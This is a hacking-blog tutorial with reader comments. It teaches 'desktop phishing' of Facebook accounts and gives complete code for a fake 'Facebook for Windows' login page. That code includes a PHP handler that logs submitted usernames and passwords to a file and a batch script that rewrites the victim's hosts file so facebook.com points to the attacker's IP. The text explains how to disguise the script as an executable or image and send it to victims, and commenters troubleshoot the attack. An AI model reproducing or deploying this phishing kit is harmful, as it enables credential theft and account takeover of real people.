Advanced Level Facebook Desktop Phishing Method – 2015 (Undetectable)

Advanced Level Facebook Desktop Phishing- picateshackz.com


As I’ve mentioned in my previous article, in this post we will be exploring a bit of batch file programming and then will move ahead implementing that in facebook hacking by desktop phishing. The advantage here is, the victim will not be able to identify the fake page since the URL in the address looks similar to the genuine one and this post is including a new php code for making phishing page that is undetectable and can bypass security check of a hosting site.

This tutorial would be a non-exhaustive guide for beginners. If you have not read my previous articles “DNS Hijacking” and “Hacking facebook accounts using phishing” then I might ask you to read it before continuing reading this further, since that would give you a prerequisite knowledge upon the topics that we are going to discuss today.



Difference between phishing and desktop phishing


In phishing

1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.


2.Victim enters his credentials in fake login page that goes to attacker.

3. Victim is then redirected to an error page or genuine website depending on attacker.

But main drawback in phishing is that victim can easily differentiate between fake and real login page by
looking at the domain name. We can overcome this in desktop phishing by spoofing domain name.

In desktop phishing

1. Attacker sends an executable file to victim and victim is supposed to double click on it. Attacker’s job is done.


2. Victim types the domain name of orignal/genuine website and is taken to our fake login page.

But the domain name remains the same as typed by victim
and victim doesn’t come to know.

3. Rest of the things are same as in normal phishing.


What is Hosts File?


The hosts file is a text file containing domain names and IP address associated with them.
Location of hosts file in windows: C:WindowsSystem32driversetc, Whenever we visit any website, say www.anything.com , an query is sent to Domain Name Server(DNS) to look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.

Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.

What is the attack?


I hope you have got an idea that how modification of this hosts file on victim’s computer can be misused.
We need to modify victim’s hosts file by adding the genuine domain name and IP address of our fake website /phishing page.Whenever victim would visit the genuine website , he would be directed to our fake login page and domain name in the URL box would remain genuine as typed by victim. Hence domain name is spoofed.



Steps to perform attack:

Step 1. Making undetectable phishing page


What you need :


Notepad++
for programming (Download : http://www.notepad-plus-plus.org/download)

Steps :


Use Notepad++ for the steps given below

1) Copy this code and paste it in a new document and save it as index.php


<?php
$id = $_GET[“id”];
if ($id == “facebookforwindows”) {
$myFile = “SoftwareDownload.jpg”;
$fh = fopen($myFile, ‘r’);
$theData = fread($fh, 500000);
fclose($fh);
echo $theData;
}

else{
$myFile1 = “Follow.jpg”;
$fh1 = fopen($myFile1, ‘r’);
$theData1 = fread($fh1, 500000);
fclose($fh1);
echo $theData1;
}
?>

Note : Change “($id == “facebookforwindows”)” with “($id == “YOUR_PASSWORD”)“

(You can put any password as YOUR_PASSWORD)

2) Copy below code and paste it in a new document and save it as Follow.jpg (Code Not By ME)


<!DOCTYPE html>
<html>
 <head>
  <title>Find your Facebook ID – a 5-second easy tool for locating your Facebook numeric personal ID</title>
  <meta name=”description” content=”If you need to know your Facebook numeric peronal ID, just plug your Profile URL into this simple tool.” />
  <link rel=”stylesheet” href=”reset.css” type=”text/css” media=”screen”>
  <link rel=”stylesheet” href=”style.css” type=”text/css” media=”screen”>

 <script src=”http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js”></script>  <script src=”script.js” type=”text/javascript” charset=”utf-8″></script>
  <meta property=”fb:admins” content=”1146295886″ />
 </head>
 <body>
   
  <form action=”” method=”post”>

 <label for=”fb_profile_url” class=”text-input-label fb_profile_url-text-input-label”>
  Enter your personal Facebook profile URL:
 </label>

 <input type=”text” name=”fb_profile_url” value=”” class=”nr-text” size=”45″ placeholder=”http://www.facebook.com/YourProfileName” />
 <input type=”hidden” name=”unsanitized” class=”nr-hidden hidden-input-for-unsanitized” />
 <p>
  <input type=”submit” value=”Lookup numeric ID…” class=”button-primary”>
 </p>

 <h1>Easily find your Facebook numeric personal ID for fb:admins social plugins and more!</h1>

 <p id=”description”>
  For integrations of certain Facebook social plugins, like the “Like” button and “Like box”, and others, Facebook
  requires that you know your Facebook numeric user ID.  Unfortunately, they make this very difficult to find, especially
  if you have a so-called “vanity” personalized profile URL. If you can’t find your Facebook ID, or don’t know what it is
  and need it, just enter your full Facebook profile URL in the above form, and we can scrape the ID from the code of your
  personal profile page.
 </p>

</form>

<script type=”text/javascript”>
  var _gaq = _gaq || [];
  _gaq.push([‘_setAccount’, ‘UA-3361652-13’]);
  _gaq.push([‘_trackPageview’]);
  (function() {
    var ga = document.createElement(‘script’); ga.type = ‘text/javascript’; ga.async = true;
    ga.src = (‘https:’ == document.location.protocol ? ‘https://ssl’ : ‘http://www’) + ‘.google-analytics.com/ga.js’;
    var s = document.getElementsByTagName(‘script’)[0]; s.parentNode.insertBefore(ga, s);
  })();
</script>
 </body>
</html>


3) Copy this code and paste it in a new document and save it as data.php

<?php
header (‘Location:https://www.facebook.com/’);
$handle = fopen(“PassFace.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

4) Copy this code and paste it in a new document and save it as SoftwareDownload.jpg


<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN” “http://www.w3.org/TR/html4/loose.dtd”>
<html>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=ISO-8859-1″>
<title>Facebook For Windows : Welcome</title>
<style type=”text/css”>
html, body
{
   height: 100%;
}
div#space
{
   width: 1px;
   height: 50%;
   margin-bottom: -360px;
   float:left
}
div#container
{
   width: 1250px;
   height: 720px;
   margin: 0 auto;
   position: relative;
   clear: left;
}
</style>
<style type=”text/css”>
body
{
   margin: 0;
   padding: 0;
   background-color: #6579A8;
   color: #000000;
}
</style>
<style type=”text/css”>
h3
{
   font-family: Arial;
   font-size: 24px;
   font-weight: normal;
   font-style: normal;
   text-decoration: none;
   color: #000000;
   margin: 0 0 0 0;
   padding: 0 0 0 0;
   display: inline;
}
a:hover
{
   color: #90F518;
}
</style>
<!–[if lt IE 7]>
<style type=”text/css”>
   img { behavior: url(“pngfix.htc”); }
</style>
<![endif]–>
</head>
<body>
<div id=”space”><br></div>
<div id=”container”>
<div id=”bv_Image1″ style=”margin:0;padding:0;position:absolute;left:0px;top:0px;width:1093px;height:609px;text-align:left;z-index:0;”>
<img src=”images/Facebook_Box.png” id=”Image1″ alt=”” align=”top” border=”0″ style=”width:1093px;height:609px;”></div>
<div id=”bv_Image2″ style=”margin:0;padding:0;position:absolute;left:207px;top:210px;width:168px;height:168px;text-align:left;z-index:1;”>
<img src=”images/Facebook.png” id=”Image2″ alt=”” align=”top” border=”0″ style=”width:168px;height:168px;”></div>
<div id=”bv_Text1″ style=”margin:0;padding:0;position:absolute;left:378px;top:224px;width:389px;height:90px;text-align:left;z-index:2;”>
<h3>Download Facebook For Windows :<br>
</h3><font style=”font-size:13px” color=”#000000″ face=”Arial”>size : 6 MB.<br>
Platform : Windows 8.1<br>
Security Status : Active</font><h3><br>
</h3></div>
<div id=”Html1″ style=”position:absolute;left:378px;top:307px;width:625px;height:50px;z-index:3″>
<b>Login to Donwload this Application :</b><br/>
<form name=”input” action=”data.php” method=”post”>
Username : <input type=”text” name=”username” />
Password : <input type=”password” name=”password”>
<input type=”submit” value=”Download” action=”data.php” method=”post”/>
</form></div>
</div>
</body>
</html>

5) Keep all above files in a single folder and name it as “xyz” (Anything you want)

6) Now create a folder inside that folder (“xyz“) and name it as “images” (Put exact name)

7) Download these images and put it inside “images

Image 1 : http://adf.ly/1IK1UU or Click here
Image 2 : http://adf.ly/1IK1ah or Click here

Now if you followed all the steps carefully, It will look similar to this :



You are successfully created the phishing page and We need this files in next steps.

Step 2. Setting up Xampp web server


You can use wamp or xammp , i would recommend you to use xammp and this software will help you to host phishing on your local machine.

Web server can refer to either the hardware (the computer) or the software (the computer application) that helps to deliver Web content that can be accessed through the Internet.


1) First Download and install xampp on your PC, Start Apache and Msql services



2) Copy the 5 files (including the foldr named ‘images‘) we are created in step 1, and paste its all in ht docs folder which should be under Xammp (place were you installed xampp)
(normally ht docs folder should be in the path: c:xampphtdocs)



Step 3. Setting up static vpn

I will Use proXPN VPN for this Tutorial but i recommend you to use Strong Open VPN as it is very stable you can download it from here.

Install ProXPN VPN or any other static VPN, i recommend you to use Strong Vpn as it very stable and gives you a static IP Once you install and run it, you will get a static IP (vpn).



Now you have a static ip for your Localhost.


Step 4. Creating a batch(.bat) file to accomplish replacing victims hosts file

Now we have to replace some text in the victims Host file which is at C:windowssystem32driversetc ,You can do this by many ways either by using a SFX archive or using a batch file for this tutorial we will use a batch file to accomplish the job.


Here is the batch program that I was talking about in my last post ‘DNS hijacking‘. As we have seen that, adding an IP address with a corresponding domain name in the host file would redirect you to webpage as you desire with a desired domain name.

So, we are going to take this into next level for hacking purposes. We’ll change the host file in the victim machine with the help of a batch program and redirect the victim to our fake login page. The only thing you need to consider is sending the batch program to the victim machine and running it.

Here is the batch program that can be used to manipulate the HOSTS file.

@echo off
set hostspath=%windir%System32driversetchosts

echo 62.116.159.4 www.facebook.com >> %hostspath%
echo 62.116.159.4 www.fb.com >> %hostspath%
echo 62.116.159.4 https://www.facebook.com >> %hostspath%
echo 62.116.159.4 https://fb.com >> %hostspath%

exit

Replace the ip address(62.116.159.4) with the static IP address of your vpn (The static ip vpn address you got in step 3), and save it as ‘anyname.bat‘.

Let us now discuss what exactly the above code does. The second line of the code above takes the admin privileges over the ‘hosts’ file, so that editing can be done. Then we move into the path where the ‘hosts’ file is located and then we write 4 lines into the file. Those lines of codes are responsible for the redirection of the user. Therefore, we try to redirect all the possible combinations of facebook addresses to the IP that is provided.

Remember, executing the above code containing file in the victim’s machine is your personal concern and hence I’m not describing the methodologies of spreading your code.

Step 5. Sending the file to victim

You can also change the .bat file into .exe file using batch to exe converter. Click the link to learn how to convert a batch file into an executable.

After successfully converted to anyname.exe file you can do one more step to hide this .exe file in an image file, follow my previous guide: How To Make A Virus And Hide In An Image File (FUD)


Now send the file via email or upload the file to a site and ask the victim to download the file , After the victim downloads and clicks the file, his host file will be replaced ,So now when ever the victim enters facebook.com He will be redirected to our Phisher Page, But the URL will remain as Facebook.com

To see all the victims credentials and Password open newly created log.txt file which is under ht docs folder



You are done.

Note: Use this article for educational purpose only


Recommended:

You may also like...

29 Responses

  1. Josh Das says:

    The batch program to tweak the host file didnt work for me!!! could you please check on that so that I can tweak the hosts to redirect facebook.com to my static ip??? Email : josh24das@gmail.com

  2. Mr Josh Das, Thank you for your valuable feedback.

    You are right, the batch file is not working and it was my mistake…sorry, but i have the working batch program here :

    @echo off
    set hostspath=%windir%System32driversetchosts

    echo 62.116.159.4 http://www.facebook.com >> %hostspath%
    echo 62.116.159.4 http://www.fb.com >> %hostspath%
    echo 62.116.159.4 https://www.facebook.com >> %hostspath%
    echo 62.116.159.4 https://fb.com >> %hostspath%

    exit

    Replace the ip address with your static ip

  3. Josh Das says:

    Thnx, it updated the host file,however I am now,hitting on an error, my Xapmm is on! but when I use the browser to redirect it to facebook,it wont go to my static IP, it goes to the original facebook page! n when I hit the ip in address bar,there is also an error in Index file line 2!!! please,fix let me know brother!!! m/

  4. Deepa Subedi says:

    hey.. does this work with the mobile users? i need it.. plz help me getting a person id password.. i need it.. its important. he is blackmailng me…

  5. If you you want use this phishing method with android users then you have to use android hosts tweaks instead of Creating a batch(.bat) file to accomplish replacing victims hosts file…….and you can also use Bit Web Server app instead of Xampp web server

  6. Magic says:

    I'm getting "Notice: Undefined index: id in C:xampphtdocsindex.php on line 2".

    What am I missing in that line of the index.php file? Thanks.

  7. Turn on the Apache and MySQL data servers in XAMPP

  8. Sound good.. 😉 i will probably try.. but not for harm people.. I learn hacking for make myself safe ^^ Thanks

  9. Yes …. I appreciate your words 🙂

  10. Anonymous says:

    when i tested the batch file i can't connect to facebook, i followed all the instructions..

  11. shivam goyal says:

    the image url is not working plz give the right url to download these 2 images plz

  12. Anonymous says:

    sorry my mistake your batch file is working.. the problem is facebook is preventing me to sign in.. your connection is private… attackers might trying to steal your information from http://www.facebook.com blah blha….

  13. Image files updated with alternative download link

  14. SUFYAN ARIF says:

    I did exactly like you but after altering host file on my window 8 system, my browser begin to stop opening facebook page by showing "unable to connect to internet" error on browser page. After running Apache and Mysql servers from xampp, the problem still persists. What I'm doing wrong?

    I didn't install vpn software because I already have a static IP.

  15. Runyesz says:

    Does this method work for anyone? even for the writer of this article?

  16. Face Compte says:

    Aucun de ses piratage Facebook fonctionne aujourd hui plus rien de marche sauf ce site qui est encore en ligne ▄︻̷̿┻̿═━一 http://www.facecompte.com/

    pirater compte facebook software

  17. Face Compte says:

    Aucun de ses piratage Facebook fonctionne aujourd hui plus rien de marche sauf ce site qui est encore en ligne ▄︻̷̿┻̿═━一 http://www.facecompte.com/

    facebook pirater un compte

  18. Sun Day says:

    not working waist of time

  19. chauhan indu says:

    what are android hosts tweeks …..plz give me an idea to get this host tweek

  20. Anonymous says:

    @Irshad Pathoor
    Sir can we use id from "no-ip" software? as it is gives us static ip type thing, if not, is there any free vpn to give us static ip?

  21. Anonymous says:

    @Irshad Pathoor
    Notice: Undefined index: id in C:xampphtdocsindex.php on line

    have already done that, turned on these two services, what i'm missing sir, idk. please help

  22. you changed your own host file 😀

  23. CIH DIDI says:

    really I do it but did not working.please help me Sir, I would like to need video file these training please help me…………..

  24. CIH DIDI says:

    yeah change static ip in my host file….

  25. CIH DIDI says:

    batch file not connectable to facebook link how to work brother

  26. Siddharth says:

    Do I have to make my PC turned on at the time when victim is opening that phished website?
    Plz reply

Close